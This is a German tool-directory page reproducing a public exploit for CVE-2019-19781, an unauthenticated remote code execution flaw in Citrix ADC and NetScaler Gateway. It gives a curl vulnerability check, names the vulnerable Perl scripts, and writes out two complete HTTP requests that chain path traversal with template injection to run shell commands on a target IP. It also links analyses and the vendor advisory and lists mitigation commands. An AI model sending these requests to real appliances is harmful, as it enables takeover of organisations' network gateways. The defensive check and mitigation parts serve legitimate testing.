Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-19781 — CVE-2019-19781 - Exploit für Remotecodeausführung auf Citrix ADC Netscaler | Kitploit
Tools/GitHubGitHub/mpgn/cve-2019-19781
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsIncident ResponseRemote-Access-Tool
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - Exploit für Remotecodeausführung auf Citrix ADC Netscaler

Repository anzeigen
157343vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-19781

Remote Code Execution (RCE) in Citrix Application Delivery Controller und Citrix Gateway

Es wurde eine Schwachstelle in Citrix Application Delivery Controller (ADC), früher bekannt als NetScaler ADC, und Citrix Gateway, früher bekannt als NetScaler Gateway, identifiziert, die bei Ausnutzung einem nicht authentifizierten Angreifer die Ausführung beliebigen Codes ermöglichen könnte.

EDIT: Indicator of Compromise-Scanner für CVE-2019-19781 von Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

Betroffene Produkte:

  • Citrix ADC und Citrix Gateway Version 13.0, alle unterstützten Builds
  • Citrix ADC und NetScaler Gateway Version 12.1, alle unterstützten Builds
  • Citrix ADC und NetScaler Gateway Version 12.0, alle unterstützten Builds
  • Citrix ADC und NetScaler Gateway Version 11.1, alle unterstützten Builds
  • Citrix NetScaler ADC und NetScaler Gateway Version 10.5, alle unterstützten Builds

image

Auf Verwundbarkeit prüfen

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”

Verwundbares Perl-Skript

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

Exploit

Es sind nur zwei Requests nötig, um diese Schwachstelle ohne jegliche Authentifizierung auszunutzen!

Erster Request:

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

Zweiter Request:

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

Detaillierte Analyse (englisch):

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

Sicherheitshinweis:

  • https://support.citrix.com/article/CTX267027

Patch (kein echter Patch)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
Tool herunterladen